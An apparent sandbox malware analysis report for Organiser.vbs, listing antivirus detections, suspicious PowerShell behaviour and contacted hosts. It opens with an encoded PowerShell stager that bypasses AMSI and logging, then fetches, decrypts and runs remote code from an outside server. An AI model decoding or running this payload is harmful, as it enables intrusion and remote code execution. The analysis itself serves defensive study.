EUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAOABmAGEAMQBiAFsAJwBIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFAAbwB3AGUAcgBTAGgAZQBsAGwAXABTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAkAFYAQQBMAH0ARQBMAFMARQB7AFsAUwBDAFIAaQBwAFQAQgBsAG8AQwBLAF0ALgAiAEcARQB0AEYAaQBlAGAATABEACIAKAAnAHMAaQBnAG4AYQB0AHUAcgBlAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAVABWAGEATABVAEUAKAAkAG4AdQBsAEwALAAoAE4AZQBXAC0ATwBCAEoARQBDAFQAIABDAG8ATABMAEUAQwBUAEkAbwBOAFMALgBHAEUATgBlAHIASQBDAC4ASABhAFMAaABTAEUAdABbAFMAVABSAEkAbgBnAF0AKQApAH0AJABSAEUAZgA9AFsAUgBFAEYAXQAuAEEAcwBzAGUATQBCAEwAeQAuAEcARQB0AFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpACcAKwAnAFUAdABpAGwAcwAnACkAOwAkAFIARQBGAC4ARwBlAHQARgBJAEUATABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgAnACsAJwBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAGEAbABVAGUAKAAkAE4AdQBsAGwALAAkAFQAcgBVAEUAKQA7AH0AOwBbAFMAeQBzAFQAZQBtAC4ATgBlAFQALgBTAEUAcgB2AEkAYwBFAFAATwBpAG4AVABNAEEAbgBBAEcARQByAF0AOgA6AEUAeABwAGUAYwB0ADEAMAAwAEMATwBuAHQASQBOAHUARQA9ADAAOwAkADEAYQA5ADMAMAA9AFsAUwBZAHMAdABlAG0ALgBUAGUAWAB0AC4ARQBuAGMATwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAWQB0AGUAUwAoACcAZAA0ACwAMABnAGsAQABbAFAAKgAhAC8AZgBzAHQAYQA6AGIANwBRAEIAaABsAFUARAByADYAeABFAF0AMwBfACcAKQA7ACQAUgA9AHsAJABEACwAJAAxAEEAOQAzADAAPQAkAEEAUgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkADEAQQA5ADMAMABbACQAXwAlACQAMQBBADkAMwAwAC4AQwBvAHUATgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAeABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAaQBlAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABJAG4AdABlAHIAbgBlAHQARQB4AHAAbABvAHIAZQByAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuADsAJABpAGUALgBTAGkAbABlAG4AdAA9ACQAVAByAHUAZQA7ACQAaQBlAC4AdgBpAHMAaQBiAGwAZQA9ACQARgBhAGwAcwBlADsAJABmAGwAPQAxADQAOwAkAHMAZQByAD0AJAAoAFsAVABlAFgAVAAuAEUAbgBDAE8ARABpAE4AZwBdADoAOgBVAG4AaQBDAG8ARABlAC4ARwBFAHQAUwBUAFIAaQBuAEcAKABbAEMAbwBOAHYARQByAHQAXQA6ADoARgBSAE8AbQBCAEEAUwBlADYANABTAHQAUgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABrAEEATABnAEEAeABBAEQAawBBAE4AdwBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAeABBAEQAWQBBAE8AZwBBADMAQQBEAGcAQQBNAFEAQQB3AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQAYwA9ACIAQwBGAC0AUgBBAFkAOgAgAGIAJwBOAFAAMwA3AFoAUQBvADAAZgBTAFEAagBMAHkAQgBjAHUAVABmAE8AMAAxADEAdwB1ADYANAA9ACcAIgA7ACQAaQBlAC4AbgBhAHYAaQBnAGEAdABlADIAKAAkAHMAZQByACsAJAB0ACwAJABmAGwALAAwACwAJABOAHUAbABsACwAJABjACkAOwB3AGgAaQBsAGUAKAAkAGkAZQAuAGIAdQBzAHkAKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAB9ADsAJABoAHQAIAA9ACAAJABpAGUALgBkAG8AYwB1AG0AZQBuAHQALgBHAGUAdABUAHkAcABlACgAKQAuAEkAbgB2AG8AawBlAE0AZQBtAGIAZQByACgAJwBiAG8AZAB5ACcALAAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQgBpAG4AZABpAG4AZwBGAGwAYQBnAHMAXQA6ADoARwBlAHQAUAByAG8AcABlAHIAdAB5ACwAIAAkAE4AdQBsAGwALAAgACQAaQBlAC4AZABvAGMAdQBtAGUAbgB0ACwAIAAkAE4AdQBsAGwAKQAuAEkAbgBuAGUAcgBIAHQAbQBsADsAdAByAHkAIAB7ACQAZABhAHQAYQA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAdAApAH0AIABjAGEAdABjAGgAIAB7ACQATgB1AGwAbAB9ACQASQB2AD0AJABkAEEAdABBAFsAMAAuAC4AMwBdADsAJABkAGEAVABBAD0AJABkAGEAdABhAFsANAAuAC4AJABEAGEAVABBAC4AbABlAE4ARwB0AGgAXQA7AC0AagBvAEkAbgBbAEMAaABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAVABBACAAKAAkAEkAVgArACQAMQBhADkAMwAwACkAKQAgAHwAIABJAEUAWAA=

Creates a suspicious Powershell process (2 events)

option	-nop				value	Does not load current user profile
option	-nop				value	Does not load current user profile

File has been identified by 32 AntiVirus engines on VirusTotal as malicious (32 events)

Cynet	Malicious (score: 99)
CAT-QuickHeal	Script.Trojan.39876
Skyhigh	PS/Dropper.f
ALYac	GT:VB.ObfDldr.28.29C080A2
VIPRE	GT:VB.ObfDldr.28.29C080A2
Sangfor	Malware.Generic-VBS.Save.f99adb70
Arcabit	GT:VB.ObfDldr.28.29C080A2
Symantec	Trojan.Malscript!gen8
ESET-NOD32	PowerShell/TrojanDownloader.Agent.ABM
McAfee	PS/Dropper.f
Avast	VBS:Downloader-AXD [Trj]
Kaspersky	HEUR:Trojan.PowerShell.Generic
BitDefender	GT:VB.ObfDldr.28.29C080A2
NANO-Antivirus	Trojan.Script.Downloader.inbiqr
MicroWorld-eScan	GT:VB.ObfDldr.28.29C080A2
Emsisoft	GT:VB.ObfDldr.28.29C080A2 (B)
F-Secure	Malware.VBS/PSRunner.VPSV
FireEye	GT:VB.ObfDldr.28.29C080A2
Sophos	ATK/Empire-U
Ikarus	Trojan-Downloader.PowerShell.Agent
Google	Detected
Avira	VBS/PSRunner.VPSV
MAX	malware (ai score=83)
Xcitium	TrojWare.Win32.BadShell.XSN@7pmib7
Microsoft	VirTool:PowerShell/Empire.gen!A
ZoneAlarm	HEUR:Trojan.PowerShell.Generic
GData	GT:VB.ObfDldr.28.29C080A2
AhnLab-V3	Powershell/Downloader.S5
Tencent	Heur:Trojan.Powershell.Generic.u
huorong	TrojanDownloader/PS.MalDownload.g
Fortinet	PowerShell/Agent.AN!tr
AVG	VBS:Downloader-AXD [Trj]

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (20 events)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (4 events)

dead_host	192.168.56.101:49165
dead_host	192.168.56.101:49164
dead_host	89.197.154.116:7810
dead_host	192.168.56.101:49163

Organiser.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All